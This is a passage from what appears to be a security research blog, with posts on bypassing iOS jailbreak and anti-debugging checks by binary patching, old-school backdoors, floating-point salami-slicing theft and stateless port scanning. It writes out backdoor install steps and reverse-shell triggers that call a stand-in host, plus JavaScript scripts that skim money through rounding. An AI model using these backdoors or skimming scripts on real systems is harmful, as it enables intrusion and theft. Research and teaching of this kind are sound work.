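    "/Applications/Cydia.app",
    "/bin/bash",
    "/usr/sbin/sshd",
    "/etc/apt",
};

int isJailBroken(void) {
    struct stat st;
    for (unsigned i = 0; i < sizeof(jbFiles) / sizeof(jbFiles[0]); i++) {
        if (stat(jbFiles[i], &st) == 0)
            return 1;   /* artifact found: this is the R0 = 1 path we meet later */
    }
    return 0;
}

int main(void) {
    printf("%s\n", isJailBroken() ? "Device is JAILBROKEN"
                                  : "Device is NOT jailbroken");
    return 0;
}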
 
If you have a jailbroken device and would like to test this for yourself, you can use clang – the Clang C, C++, and Objective-C compiler – to compile it from your Mac OS host. Refer to the man page for details on the following command.
clang -framework Foundation -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ jailbreak.c -o jailbreak -miphoneos-version-min=5.0
Once compiled, simply copy the binary to your jailbroken device and execute it from the command line. On a side note, Objective-C is a strict superset of C, and in most instances you will see jailbreak detections implemented in C/C++. A sample run of the program reveals that the device is jailbroken:
Figure 2: PoC execution showing device is jailbroken
 
One of the first steps during an assessment is static analysis of the binary. Let’s begin by viewing the symbols with the following command: nm jailbreak

Figure 3: Static analysis – extracting symbol information
 
Luckily for us, symbols have not been stripped, and based on the above, the _isJailBroken method looks like the function responsible for determining the state of the device.
Figure 4: Examining the binary in IDA
 
The isJailBroken method is called at 0000BE22, after which the value in R0 is compared to 0. Recall from earlier that the return value from a function call is stored in the R0 register. Let’s confirm this in gdb. We will set a breakpoint at 0000BE28, the BEQ (branch if equal) instruction, and examine the contents of the R0 register.

Figure 5: Examining the contents of the R0 register

As expected, the value in R0 is 1, and the program takes the branch that prints the message “Device is JAILBROKEN”. Our goal then is to take the other branch. Let’s examine the isJailBroken function.

Figure 6: isJailBroken function analysis

At 0000BEA0, the stat function is called, and at 0000BEA8, R0 is compared to 0. If the value is not zero, meaning the path hasn’t been found, the program processes the next file path in the jbFiles[] array shown in the PoC earlier on. However, if the path was found, we see R0 is set to 1 before the program returns and eventually exits.

Figure 7: Determining where R0 register is set

The above snippet corresponds to the following section in our PoC:

Figure 8: R0 gets set to 1 if artifact found
 
So if we update this, and instead of moving 1 into R0 we move a 0, we should be able to bypass the jailbreak detection check and thus get out of jail. Let’s make this modification and run our binary again.
Figure 9: Updating R0 register to 0
 
Linking this to our PoC, it is the equivalent of doing:
Figure 10: Effect of setting R0 to 0
 
In other words, the isJailBroken function will always return 0. Let’s set another breakpoint after the comparison like we did before and examine the value in R0. If we are right, then according to the following snippet, we should branch to loc_BE3C and defeat the check.
Figure 11: PoC snippet
 
As expected, the value is now 0, and when we continue program execution we get our desired result.

Figure 12: Bypassing the detection
 
But what if the binary has been stripped?
Earlier we said that we were lucky because the binary was not stripped, so we had the symbol information. Suppose, however, that the developer decided to make our job a bit more difficult by stripping the binary (in our case we used strip <binaryname>). In this case, our approach would be a bit different. Let’s first look at the stripped binary using the nm tool:
Figure 13: Stripped binary
 
And then with gdb on the jailbroken mobile device:
Figure 14: Examining the stripped binary in gdb
 
It should be immediately clear that we now have a lot less information to work with. In the case of gdb, we now see “No symbol table is loaded”. Where has our isJailBroken symbol gone? Let’s push ahead with our analysis by running strings on the binary.
Figure 15: Extracting strings from the binary
 
Ok, so we seem to be getting closer as we can see some familiar messages. Let’s head back to IDA once again:
Figure 16: Disassembled stripped binary
 
This certainly looks different from what we saw when the symbols were included. Nonetheless, let’s find the references to the strings we saw earlier. You can use the strings view in IDA and then use Ctrl+X to find all references to where they are used.
Figure 17: Locating references to the status message
 
Navigating to the highlighted location, we again see the familiar CMP R0, #0:
Figure 18: Locating CMP R0, #0
 
And if we go to the highlighted sub_BE54, we end up in our isJailBroken function. From that point on, it’s a repeat of what we already discussed.
Ok, but the functions are now inline
Another practice that is often recommended is to inline your functions. This causes the compiler to embed the full body of the function, as opposed to making a function call. With this in mind, our modified isJailBroken function declaration now looks like this:
Figure 19: Declaring functions inline
 
Before we continue, let’s remind ourselves of what the disassembled binary looked like prior to this change:

Figure 20: Binary before inline function
 
Now, let’s examine the modified binary:
Figure 21: Modified binary with function now inline
The _isJailBroken method has now been inlined, and we no longer see the call (BL) instruction at 0000BE22 as before. Note that the original function body is still stored in the binary:
Figure 22: Function body still stored despite being inline
 
To prevent this, some very astute developers will go a step further and make the function static, thereby removing the standalone function body. The new function declaration will now be:
Figure 23: Static inline function
 
Again let’s look at this in IDA.
Figure 24: Disassembled inline binary
 
Instead of R0 being set from a function call as we saw previously, it is set from a value read from the stack using the LDR instruction at 0000BE9C. On closer examination we see the R0 register being set at 0000BE8A and 0000BE98 and then stored on the stack:
Figure 25: Disassembled inline binary
At this point it’s the same process as before; we just need to move a 0 into R0 at location 0000BE8A. And the rest is history.
Let’s block debugging then
We hinted at this earlier, when we said that the ptrace() system call is used when debugging an application. Let’s examine one implementation often used by developers:
Figure 26: ptrace function declaration
 
Figure 27: ptrace implementation
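Figures 26 and 27 are screenshots; the implementation they show is the widely circulated ptrace_ptr wrapper (see reference 5), which looks roughly like this — ptrace is resolved at runtime with dlsym so the symbol stays out of the import table:

#include <dlfcn.h>
#include <sys/types.h>

#define PT_DENY_ATTACH 31

typedef int (*ptrace_ptr_t)(int request, pid_t pid, caddr_t addr, int data);

static void disable_debugging(void) {
    void *handle = dlopen(0, RTLD_GLOBAL | RTLD_NOW);
    ptrace_ptr_t ptrace_ptr = (ptrace_ptr_t)dlsym(handle, "ptrace");
    ptrace_ptr(PT_DENY_ATTACH, 0, 0, 0);  /* the kernel now refuses attachment */
    dlclose(handle);
}

int main(void) {
    disable_debugging();
    return 0;   /* try attaching gdb after this point */
}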
 
See the references section for additional details and source of the above code snippet. If we run our modified binary on the device and try to debug it as we have been doing with gdb, we are presented with the following:
Figure 28: Unable to use gdb
We were stopped in our tracks. Also, keep in mind that the function was inlined and the binary stripped of symbols. Examining it in IDA reveals the following:

Figure 29: Disassembled binary with call to ptrace_ptr
Pay special attention to the highlighted area. Recall from earlier that function arguments are passed in registers R0-R3. The ptrace_ptr call takes four arguments, the first being PT_DENY_ATTACH with a value of 31. The /usr/include/sys/ptrace.h header file reveals the list of possible values:
Figure 30: Snippet ptrace documentation
 
So what happens if we pass a value that is outside of the expected values? The parameter is set at 0000BDF2 and later passed to ptrace_ptr at 0000BDFC. We see a value of 1F, which translates to 31 in decimal. Let’s update this to 0x7F.
Figure 31: Updating PT_DENY_ATTACH to random value
 
We copy the modified binary back to our device and have our bypass.
Figure 32: Bypassing PT_DENY_ATTACH
 
Another oft-recommended technique for determining whether a debugger is attached is the use of the sysctl() function. It doesn’t explicitly prevent a debugger from being attached, but it does return enough information for you to determine whether you are debugging the application. The code is normally a variation of the following:
Figure 33: Using sysctl()
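Figure 33 is a screenshot; the variation in question is usually a checkDebugger() built on Apple’s documented sysctl() pattern, roughly as follows (the function name is taken from the text, the rest is reconstructed):

#include <stdio.h>
#include <string.h>
#include <sys/proc.h>
#include <sys/sysctl.h>
#include <unistd.h>

/* Returns 1 when a debugger is attached, or when the check itself fails. */
static int checkDebugger(void) {
    int mib[4] = { CTL_KERN, KERN_PROC, KERN_PROC_PID, getpid() };
    struct kinfo_proc info;
    size_t size = sizeof(info);
    memset(&info, 0, sizeof(info));
    if (sysctl(mib, 4, &info, &size, NULL, 0) == -1)
        return 1;                                     /* the "copies 1 to R0" path */
    return (info.kp_proc.p_flag & P_TRACED) ? 1 : 0;  /* the ternary we meet below */
}

int main(void) {
    printf("checkDebugger() = %d\n", checkDebugger());
    return 0;
}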
When we run this from gdb, we get:
Figure 34: Output from running with sysctl()
Let’s pop this in IDA. Again the binary has been stripped and the checkDebugger function inlined.
Figure 35: Call to sysctl()
At 0000BE36 we see the sysctl() function call, and at 0000BE3A we see the comparison of register R0 to -1. If the call was not successful, then at 0000BE40 the program copies 1 to R0 before returning. That logic corresponds to:
Figure 36: Code snippet showing call to sysctl()
The fun begins when sysctl() is successful. We see the following snippet:
Figure 37: A look at the ternary operator
This corresponds to the following code snippet:
Figure 38: Ternary operator in our source code
When the application is being debugged/traced, the kernel sets the P_TRACED flag for the process, where P_TRACED is defined in /usr/include/sys/proc.h as:
Figure 39: P_TRACED definition in /usr/include/sys/proc.h
 
So at 0000BE4A we see the bitwise AND against this value. In effect, the loc_BE46 block corresponds to the above ternary operator in the return statement. What we want then is for this call to return 0.
If we change the instruction at 0000BE46 to MOVS R0, #0 instead:
Figure 40: Patching the binary
 
When we run the program again, we get:
Figure 41: Successful bypass
 
Now, you may be asking, how did we know to update that specific instruction? Well, as we said, the loc_BE46 block corresponds to the use of the ternary operator in our code. Now don’t allow the compiler’s representation of the operator to confuse you. The ternary operator says: if the process is being traced return 1, otherwise return 0. R0 is set to 1 at 0000BE46, and R0 is also set at 0000BE5C. However, in the latter case, the register is set in a conditional block, and that block gets hit when the check returns 0, in other words, when the process is not being traced. Let’s look at this in gdb. We will set a breakpoint at 0000BE5E, the point at which R0 gets stored on the stack at [sp,#0x20].
Figure 42: Inspecting the R0 register
As you can see, R0 has a value of 1, and this was set at 0000BE46 as discussed earlier. This value is then written to the stack and later accessed at 0000BE60 to determine whether the process is being traced. We see the comparison against 0 at 0000BE62, and if it’s true, we take the path that shows we bypassed the debug check.
Figure 43: Reversing the binary
So, if we set a breakpoint at 0000BE60 and look at the value read from the stack, we see the following:
Figure 44: Examining the value in R0 that will be checked to determine if process is being debugged
This value (0x00000001) is the 1 that was copied to R0 earlier on. Hence, updating it to 0 achieves our goal.
Bringing down the curtains
Before we go, let’s revisit our very first example:
Figure 45: Revisiting first example
Recall we modified the isJailBroken function by setting register R0 to 0. However, there is a much simpler way to achieve our objective, and some of you would have already picked it up. The instruction at 0000BE28 is BEQ (branch if eq), so all we really need to do is change this to an unconditional jump to loc_BE3C. After the modification we end up with:
Figure 46: Updated conditional jump to unconditional jump
And we are done; however, we had to take the long, scenic route first.
 
Conclusion
As we demonstrated, each time the developer added a new measure, we were able to bypass it. This however does not mean that the measures were completely ineffective. It just means that developers should implement these and other measures to guard against this type of activity. There is no silver bullet.
From a pen tester’s stand point, it comes down to time and effort. No matter how complex the function, at some point it has to return a value, and it’s a matter of finding that value and changing it to suit our needs.
Detecting jailbreaks will continue to be an interesting topic. Remember, however, that an application running at a lower privilege can be tampered with by one that is at a higher privilege. A jailbroken device can run code in kernel-mode and can therefore supply false information to the application about the state of the device.
Happy hacking.
 
References:
  1. http://www.amazon.com/The-Mobile-Application-Hackers-Handbook/dp/1118958500
  2. http://www.amazon.com/Practical-Reverse-Engineering-Reversing-Obfuscation/dp/1118787315
  3. http://www.amazon.com/Hacking-Securing-iOS-Applications-Hijacking/dp/1449318746
  4. https://www.owasp.org/index.php/IOS_Application_Security_Testing_Cheat_Sheet
  5. https://www.theiphonewiki.com/wiki/Bugging_Debuggers
  6. http://www.opensource.apple.com/source/xnu/xnu-792.13.8/bsd/sys/ptrace.h
INSIGHTS | September 8, 2015

The Beauty of Old-school Backdoors

These days, advanced voodoo rootkit techniques exist for persistence after you’ve got a shell during a pen test. Moreover, there are some bugdoors implemented on purpose by vendors, but that’s a different story. Beautiful techniques and code are available, but do you remember that subtle code you used to use to sneak through the door? Enjoy that nostalgia by sharing your favorite one(s) using the #oldschoolbackdoors hashtag on social networks.

 

In this post, I present five Remote Administration Tools (RATs) a.k.a. backdoors that I personally used and admired. It’s important to mention that I used these tools as part of legal pen testing projects in order to show the importance of persistence and to measure defensive effectiveness against such tools.
1. Apache mod_rootme backdoor module (2004)

“mod_rootme is a very cool module that sets up a backdoor inside of Apache where a simple GET request will allow a remote administrator the ability to grab a root shell on the system without any logging.”

 

One of the most famous tools only required you to execute a simple make command to compile the shared object, copy it into the modules directory, insert “LoadModule rootme2_module /usr/lib/apache2/modules/mod_rootme2.so” into httpd.conf, and restart the httpd daemon with ‘apachectl stop; apachectl start’. After that, a simple “GET root” would give you back a w00t shell.

 

2. raptor_winudf.sql – A MySQL UDF backdoor (2004–2006)

“This is a MySQL backdoor kit based on the UDFs (User Defined Functions) mechanism. Use it to spawn a reverse shell (netcat UDF on port 80/tcp) or to execute single OS commands (exec UDF).”

 

For this backdoor, you used a simple ‘#mysql -h x.x.x.x < raptor_winudf.sql’ to inject the backdoor as a user-defined function. From there, you could execute commands with ‘mysql> select exec(‘ipconfig > c:\out.txt’);’ from the MySQL shell.

 

A cool reverse-shell feature was implemented as well and could be called with ‘mysql> select netcat(‘y.y.y.y’);’ in order to send an interactive shell to port 80 on the host supplied (y.y.y.y). The screenshot below shows the variant for Linux.

Screenshot source:
http://infamoussyn.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/ (no longer active)
 
3. Winamp get_wbkdr.dll plugin backdoor (2006)

“wbkdr is a proof of concept Winamp backdoor that makes use of the plugin interface. It spawns cmd.exe on port 24501.”

 

This one was as easy as copying the DLL into C:\Program Files\Winamp\Plugins and playing your favorite song with Winamp in order to get a pretty cmd.exe attached to port 24501.

 

4. BIND reverse shell backdoor (2005)
This backdoor used an unpublished patch for BIND, the most widely used DNS daemon on the Internet, developed by a friend of mine from Argentina. Basically, you had to patch the source, then compile and run named, normally as root. Once it was running, sending a DNS request of the form ‘nslookup backdoorpassword:x.x.x.x:port target_DNS_server’ would trigger a reverse shell to the host x.x.x.x on the given port.
5. Knock-out – a port-knocking based backdoor (2006)

This is a backdoor I made using libpcap for packet sniffing (server) and libnet for packet crafting (client). I made use of the port-knocking technique to enable the backdoor, which could be a port bind or a reverse shell. The server and client use the same configuration file to determine which ports to knock and the time gap between each network packet sent. Knock-out supports TCP and UDP and still works on recent Linux boxes (tested under Ubuntu Server 14.04).
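Knock-out itself crafts packets with libnet, but the client idea can be sketched with plain sockets: fire a connection attempt at each agreed port, pausing for the agreed gap. The address, port sequence, and one-second gap below are made-up values, not Knock-out’s configuration format:

#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void) {
    const char *target = "192.0.2.10";          /* illustrative address */
    int knock_ports[] = { 7000, 8000, 9000 };   /* illustrative sequence */
    for (int i = 0; i < 3; i++) {
        int s = socket(AF_INET, SOCK_STREAM, 0);
        struct sockaddr_in a = { 0 };
        a.sin_family = AF_INET;
        a.sin_port = htons(knock_ports[i]);
        inet_pton(AF_INET, target, &a.sin_addr);
        connect(s, (struct sockaddr *)&a, sizeof(a)); /* the SYN is the knock */
        close(s);
        sleep(1);                                /* time gap between knocks */
    }
    puts("knock sequence sent");
    return 0;
}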

 

I’d say most of these backdoors still work today. You should try them out. Also, I encourage you to share the rarest backdoors you’ve ever seen, the ones that you liked the most, and the peculiar ones you tried and fell in love with. Don’t forget to use the #oldschoolbackdoors hashtag ;-).

INSIGHTS | August 25, 2015

Money may grow on trees

Sometimes when buying something that costs $0.99 USD (99 cents) or $1.01 USD (one dollar and one cent), you may pay an even dollar. Either you or the cashier may not care about the remaining penny, and so one of you takes a small loss or profit.

 

Rounding at the cash register is a common practice, just as it is in programming languages when dealing with very small or very large numbers. I will describe here how an attacker can make a profit when dealing with the rounding mechanisms of programming languages.
 
Lack of precision in numbers

The IEEE 754 standard has defined floating point numbers for more than 30 years. The requirements that guided the formulation of the standard for binary floating-point arithmetic provided for the development of very high-precision arithmetic.

 

The standard defines how operations with floating point numbers should be performed, and also defines standard behavior for abnormal operations. It identifies five possible types of floating point exceptions: invalid operation (highest priority), division by zero, overflow, underflow, and inexact (lowest priority).

 

We will explore what happens when inexact floating point exceptions are triggered: the rounded result of a valid operation can differ from the real (and sometimes infinitely precise) result, and the difference may go unnoticed.
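A quick way to watch the inexact exception fire, sketched in C with the standard fenv.h interface (the volatile qualifiers just keep the compiler from folding the sum at compile time):

#include <fenv.h>
#include <stdio.h>

int main(void) {
    volatile double a = 0.1, b = 0.2;  /* neither value is exact in binary */
    feclearexcept(FE_ALL_EXCEPT);
    volatile double sum = a + b;       /* raises FE_INEXACT: result is rounded */
    if (fetestexcept(FE_INEXACT))
        printf("inexact result: %.17g\n", sum);  /* 0.30000000000000004 */
    return 0;
}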
 
Rounding
Rounding takes an exact number and, if necessary, modifies it to fit in the destination’s format. Normally, programming languages do not alert for the inexact exception and instead just deliver the rounded value. Nevertheless, documentation for programming languages contains some warnings about this:

 

To exemplify this matter, this is how the number 0.1 looks internally in Python:

 

The decimal value 0.1 cannot be represented precisely in binary notation, since it is an infinitely repeating fraction in base 2. Python rounds the number to 0.1 before showing the value.
 
Salami slicing the decimals

Salami slicing refers to a series of small actions that will produce a result that would be impossible to perform all at once. In this case, we will grab the smallest amount of decimals that are being ignored by the programming language and use that for profit.

 

Let’s start to grab some decimals in a way that goes unnoticed by the programming language. Certain calculations will trigger more obvious differences using certain specific values. For example, notice what happens when using v8 (Google’s open source JavaScript engine) to add the values 0.1 plus 0.2:

 

Perhaps we could take some of those decimals without JavaScript noticing:

 

 

 

But what happens if we are greedy? How much can we take without JavaScript noticing?

 
 
That’s interesting; we learned that it is even possible to take more than what was shown, but no more than 0.00000000000000008 from that operation before JavaScript notices.
I created a sample bank application to explain this, pennies.js:
 
// This is used to wire money
function wire(deposit, money, withdraw) {
  account[deposit] += money;
  account[withdraw] -= money;
  if(account[withdraw]<0)
    return 1; // Error! The account can not have a negative balance
  return 0;
}
 
// This is used to print the balance
function print_balance(time) {
  print("--------------------------------------------");
  print(" The balance of the bank accounts is:");
  print(" Account 0: "+account[0]+" u$s");
  print(" Account 1: "+account[1]+" u$s (profit)");
  print(" Overall money: "+(account[0]+account[1]))
  print("--------------------------------------------");
  if(typeof time !== 'undefined') {
     print(" Estimated daily profit: "+( (60*60*24/time) * account[1] ) );
     print("--------------------------------------------");
  }
}
 
// This is used to set the default initial values
function reset_values() {
  account[0] = initial_deposit;
  account[1] = 0; // I will save my profit here
}
 
account = new Array();
initial_deposit = 1000000;
profit = 0
print("\n1) Searching for the best profit");
for(i = 0.000000000000000001; i < 0.1; i+=0.0000000000000000001) {
  reset_values();
  wire(1, i, 0); // I will transfer some cents from the account 0 to the account 1
  if(account[0]==initial_deposit && i>profit) {
    profit = i;
 //   print("I can grab "+profit.toPrecision(21));
  } else {
    break;
  }
}
print("   Found: "+profit.toPrecision(21));
print("\n2) Let's start moving some money:");
 
reset_values();
 
start = new Date().getTime() / 1000;
for (j = 0; j < 10000000000; j++) {
  for (i = 0; i < 1000000000; i++) {
    wire(1, profit, 0); // I will transfer some cents from the account 0 to the account 1
  }
  finish = new Date().getTime() / 1000;
  print_balance(finish-start);
}
 

The attack against it will have two phases. In the first phase, we will determine the maximum amount of decimals that we are allowed to take from an account before the language notices something is missing. This amount is related to the value we are taking from: the higher the value, the more decimals we can take. Our Bank Account 0 will have $1,000,000 USD to start with, and we will deposit our profits into a secondary Account 1:

 

Due to the decimals being silently shifted to Account 1, the bank now believes that it has more money than it actually has.

 

Another way to abuse the loss of precision involves large numbers. The problem becomes visible once values reach at least 17 digits.
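A quick check in a JavaScript console shows the effect (doubles carry only about 15 to 17 significant decimal digits):

9999999999999999                             // 10000000000000000 (16 nines round up)
10000000000000000 - 1 === 10000000000000000  // true; subtracting 1 changes nothing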
 

Now, the sample attack application targets a cryptocurrency, fakecoin.js:

 

 
// This is used to wire money
function wire(deposit, money, withdraw) {
  account[deposit] += money;
  account[withdraw] -= money;
  if(account[withdraw]<0) {
    return 1; // Error! The account cannot have a negative balance
  }
  return 0;
}
 
// This is used to print the balance
function print_balance(time) {
  print("-------------------------------------------------");
  print(" The general balance is:");
  print(" Crypto coin:  "+crypto_coin);
  print(" Crypto value: "+crypto_value);
  print(" Crypto cash:  "+(account[0]*crypto_value)+" u$s");
  print(" Account 0: "+account[0]+" coins");
  print(" Account 1: "+account[1]+" coins");
  print(" Overall value: "+( ( account[0] + account[1] ) * crypto_value )+" u$s")
  print("-------------------------------------------------");
  if(typeof time !== 'undefined') {
     seconds_in_a_day = 60*60*24;
     print(" Estimated daily profit: "+( (seconds_in_a_day/time) * account[1] * crypto_value) +" u$s");
     print("-------------------------------------------------\n");
  }
}
 
// This is used to set the default initial values
function reset_values() {
  account[0] = initial_deposit;
  account[1] = 0; // profit
}
 
// My initial money
initial_deposit = 10000000000000000;
crypto_coin = "Fakecoin"
crypto_value = 0.00000000011;
 
// Here I have my bank accounts defined
account = new Array();
 
print("\n1) Searching for the best profit");
profit = 0
for (j = 1; j < initial_deposit; j+=1) {
  reset_values();
  wire(1, j, 0); // I will transfer a few coins from account 0 to account 1
  if(account[0]==initial_deposit && j > profit) {
    profit = j;
  } else {
    break;
  }
}
print("   Found: "+profit);
reset_values();
start = new Date().getTime() / 1000;
print("\n2) Let's start moving some money");
for (j = 0; j < 10000000000; j++) {
  for (i = 0; i < 1000000000; i++) { 
    wire(1, profit, 0); // I will transfer the skimmed coins from account 0 to account 1
  }
  finish = new Date().getTime() / 1000;
  print_balance(finish-start);
}
 
 
We will buy 10000000000000000 units of Fakecoin (with each coin valued at $0.00000000011 USD) for a total value of $1,100,000 USD. We will transfer one Fakecoin at a time from Account 0 to a second account that will hold our profits (Account 1). JavaScript will not notice the missing Fakecoin in Account 0, and will allow us to profit approximately $2,300 USD per day:
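That daily figure depends entirely on how fast the machine can run wire(); as a rough sanity check of the order of magnitude:

// Each skimmed coin is worth 0.00000000011 u$s, so ~2,300 u$s/day implies
// on the order of 240 million successful wire() calls per second:
2300 / (0.00000000011 * 60*60*24)  // ≈ 242,000,000 transfers per second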

Depending on the implementation, an attacker can use either floating point numbers or large numbers to generate money out of thin air.
 
Conclusion
In conclusion, programmers can avoid inexact floating point exceptions with some best practices:
  • If you rely on values that use decimal numbers, use arbitrary-precision types such as BigDecimal in Java.
  • Do not store values longer than 16 digits in floating point variables, and truncate any extra decimals; or
  • Use libraries that rely on quadruple precision (that is, twice the precision of a regular double).
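As a concrete illustration of the first two points, here is a minimal sketch (mine, not part of the original pennies.js) of the wire() function reworked to keep balances in integer cents, which remain exact as long as they fit within 53 bits:

// Balances are held in integer cents; integers up to 2^53 - 1 are exact doubles.
function wireCents(account, deposit, cents, withdraw) {
  if (!Number.isSafeInteger(cents) || cents < 0)
    return 1; // Error! Reject amounts that cannot be represented exactly
  if (account[withdraw] - cents < 0)
    return 1; // Error! The account cannot have a negative balance
  account[deposit] += cents;
  account[withdraw] -= cents;
  return 0;
}

account = [100000000, 0];    // $1,000,000.00 and $0.00, expressed in cents
wireCents(account, 1, 1, 0); // moving a single cent is now exact: nothing to skim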

 

INSIGHTS | July 30, 2015

Saving Polar Bears When Banner Grabbing

As most of us know, the Earth’s CO2 levels keep rising, which directly contributes to the melting of our pale blue dot’s icecaps. This is slowly but surely making it harder for our beloved polar bears to keep on living. So, it’s time for us information security professionals to help do our part. As we all know, every packet traveling over the Internet is processed by power-hungry CPUs. By simply sending fewer packets, we can consume less electricity while still getting our banner grabbing, and subsequently our work, done.

 
But first, a little bit of history. Back in the old days, port scanners were very simple. Some of the first scanners out there were probe_tcp_ports (published in Phrack #46) and pscan.c by pluvius. The first scanner I found that actually managed to use non-blocking I/O was strobe, written somewhere in 1995 by Proff, more commonly known nowadays as Julian Assange. Using non-blocking I/O obviously made it a lot faster.
 
In 1996, scantcp.c, written by Uriel Maimon (published in Phrack #49), became one of the first scanners to use half-open/SYN scanning. This was followed by the introduction of nmap by Fyodor (Gordon Lyon) in The Art of Port Scanning (published in Phrack #51) in 1997.
 
Of course, any security person worth his salt knows nmap and is at least familiar with a good subset of the myriad of scanning techniques it implements. But, in many cases, when scanning for TCP ports we want results as quickly as possible, so we can get a list of open ports we can connect to from the source address that we’re scanning and subsequently identify the services behind those ports.
 
To determine if a port is open, we send out a SYN packet and watch for one of several things to happen. Assuming there are no firewalls or routing issues, the receiving TCP/IP stack will either:
  •  Send a packet with the RST flag set, which means the port is closed and the host is not accepting connections on that port.
  • Send a packet with the SYN and ACK flags set, which means the host is accepting the connection. The operating system under which nmap runs doesn’t know anything about the outgoing SYN packet (as it was created in raw mode), so it will send back an RST packet as a reply.

 
To summarize, see the following image (courtesy of the nmap book):
 
 
This is great, as we can now list the open ports, and this forms the basis of half-open/SYN scanning. However, one thing that nmap does is track the number of outstanding probes and retransmit them a number of times if no response is received in a timely fashion. This leads to a lot of complexity, and it makes scanning slower too. Besides that, standard scanning modes do not offer protection against an adversary who is feeding wrong responses down the pipe. So nmap can, under such circumstances, claim that a port is open when it is not, or vice versa.
 
This led to some efforts to protect the outgoing SYN probes by cryptographically signing them. The first known public release of this was scanrand by Dan Kaminsky, introduced in his Paketto Keiretsu collection of utilities. It generates and fires off packets as quickly as possible. Each SYN probe is protected by a cryptographic cookie based on an HMAC calculated over the 4-tuple identifying the connection (the source and destination IP addresses and ports) and a randomly generated secret. As a valid reply for an open port needs to be sent back with an incremented TCP ACK value, it’s easy to recalculate the original cookie and deduce whether it was indeed a response to a packet sent out by the scanner. This completely eliminates the need to keep state, although a bit of packet loss can mean some probes get lost and won’t be retransmitted, and as such not all open ports will be discovered.
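scanrand itself is written in C, but the cookie computation is tiny. Here is a sketch of the idea in JavaScript (Node.js; the function names and HMAC choice are mine, not scanrand’s): the probe’s 32-bit sequence number is an HMAC over the connection 4-tuple, so any SYN|ACK whose acknowledgment number is not that value plus one can be discarded without keeping state:

const crypto = require('crypto');
const secret = crypto.randomBytes(16); // randomly generated per-scan secret

// Derive the SYN probe's sequence number from the connection 4-tuple.
function synCookie(srcIP, srcPort, dstIP, dstPort) {
  return crypto.createHmac('sha256', secret)
               .update(srcIP + ':' + srcPort + '->' + dstIP + ':' + dstPort)
               .digest()
               .readUInt32BE(0);
}

// A SYN|ACK from an open port must acknowledge our sequence number + 1.
function isGenuineReply(srcIP, srcPort, dstIP, dstPort, ackNumber) {
  return ((synCookie(srcIP, srcPort, dstIP, dstPort) + 1) >>> 0) === ackNumber;
}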
 
So that’s all great. But what’s one of the first things we do after discovering an open port? Connect to it properly. Possibly to do a banner grab or a version scan or just to see what the heck is behind this port. Now when it comes to standard IANA port assignments, in most cases, it’s relatively clear what’s behind a port. If open, port 22 is most likely SSH, port 80 HTTP, port 143 IMAP etc. But we still want to check.
 
So what happens if you do an nmap version scan? Or a simple banner grab after a port scan? After receiving a SYN|ACK reply from an open port, the scanner jots down that the port is open, and then connects to it. The only way to do this is to go through libc and the kernel and do a full TCP connect() call. This will result in another SYN – SYN|ACK – ACK exchange on the wire before any data can actually be exchanged. Combining that with the original SYN – SYN|ACK – RST exchange, that’s a total of three potentially unnecessary packets being exchanged.
 
So how would one go about solving this? There are a few approaches. One is by patching the host kernel and enabling an API that allows us to send out raw SYN probes without keeping any state. By then adding a callback API when valid SYN|ACK packets are received, we would have a mechanism to turn these connections into valid file descriptors. But that means writing a lot of complicated kernel code.
 
The other approach is to use a userland TCP/IP stack. These work exactly the same as any normal TCP/IP stack, but they just run in userspace. That makes it easier to integrate them into scanners and modify them without having to deal with complicated custom kernel modules.
 
As I wrote several scanners over the years, I always wanted to have a good userland TCP/IP stack, but I never saw one that fit my needs or whose code quality I actually liked. And writing one myself seemed like a lot of work, so I shied away from it.
 
Anyhow, ever seen the movie American Beauty? Where Kevin Spacey’s wife comes home and asks him about the 1970 Pontiac Firebird out on the driveway which he bought with the money received from blackmailing his former boss? It’s such a great scene; “the car I’ve always wanted and now I have it. I rule”.
 
 
That’s sort of how I felt when I stumbled upon Patrick Kelsey’s libuinet. The userland TCP/IP stack I’ve always wanted, and now I have it. I rule!! It’s a port of the FreeBSD TCP/IP stack, with kernel paradigms mapped onto userland libraries such as POSIX threads. It’s great, and with a bit of fiddling I got it to work on Linux too.
 
That enabled me to combine the two ideas into one port scanner: the stateless SYN scanning first introduced in scanrand, and a userland TCP/IP stack. Now I can immediately resume doing a banner grab or sending a request without having to do another TCP connect() call. To prevent the hosting Linux kernel from interfering and sending an RST packet, an iptables firewall rule is inserted; otherwise, by the time the userland TCP/IP stack tries to pick up the connection from the SYN|ACK, the Linux kernel will already have front-run it and sent out the RST. After this was figured out, tying everything else together in the tool was relatively easy, and thus polarbearscan was born.
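For the curious, the rule in question is a one-liner along these lines (the source address is whatever the scanner binds to; this is illustrative, not copied from the tool):

$ sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 10.0.2.15 -j DROP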
 
The above approach saves us from sending a couple of packets, and thus saves CPU cycles, and so we can hopefully give the polar bears a few more years. The code for polarbearscan can be found here, and instructions on how to compile it and get it up and running on Linux systems are in the README in the distribution.
 
A sample run of the tool doing a standard banner grab for ports 21, 22, and 143 (FTP, SSH, IMAP), with a bandwidth limitation for outgoing SYN probes of just 10kbps, scanning a /20 range will yield something like this:
 
$ sudo ./pbscan -10k -sB -p21,22,143 x.x.x.x/20
 

seed: 0xb21f7f4e, iface: eth0, src: 10.0.2.15 (id: 54321, ttl: 64, win: 65535)
x.x.x.6:21 -> 220———- Welcome to Pure-FTPd [privsep] [TLS] ———-
x.x.x.6:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.14:21 (t/o: 0s)
x.x.x.6:143 -> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN] Dovecot DA ready.
x.x.x.8:143 -> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN] Dovecot DA ready.
x.x.x.15:21 (t/o: 0s)
x.x.x.16:21 (t/o: 0s)
x.x.x.8:22 -> SSH-2.0-OpenSSH_5.3
x.x.x.9:143 -> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN] Dovecot DA ready.
x.x.x.8:21 -> 220 ProFTPD 1.3.3e Server ready.
x.x.x.10:22 -> SSH-2.0-OpenSSH_4.3
